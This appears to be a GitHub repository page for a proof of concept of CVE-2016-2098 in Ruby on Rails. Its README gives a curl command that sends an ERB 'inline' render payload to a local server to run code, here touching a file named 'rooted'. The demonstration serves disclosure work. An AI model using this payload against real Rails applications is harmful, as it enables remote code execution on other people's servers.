Proof of concept showing how CVE-2016-2098 leads to remote code execution
Switch branches/tags
Nothing to show
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Failed to load latest commit information.
app
bin
config
db
lib
log
public
test
vendor/assets
.gitignore
Gemfile
Gemfile.lock
README.rdoc
Rakefile
config.ru

README.rdoc

README

Proof of concept for groups.google.com/forum/#!topic/rubyonrails-security/ly-IH-fxr_Q

Exploiting:

  1. You should only run rails server in a way that you are certain will not open you up to being exploited

  2. Run `rails s`

  3. Execute the following command

`curl -v -H “Accept: application/json” -H “Content-type: application/json” -X GET -d ' {“id” : { “inline” : “<%= FileUtils.touch "rooted"%>”}}' localhost:3000/exploits`

  1. Verify that the file “rooted” now exists in the project directory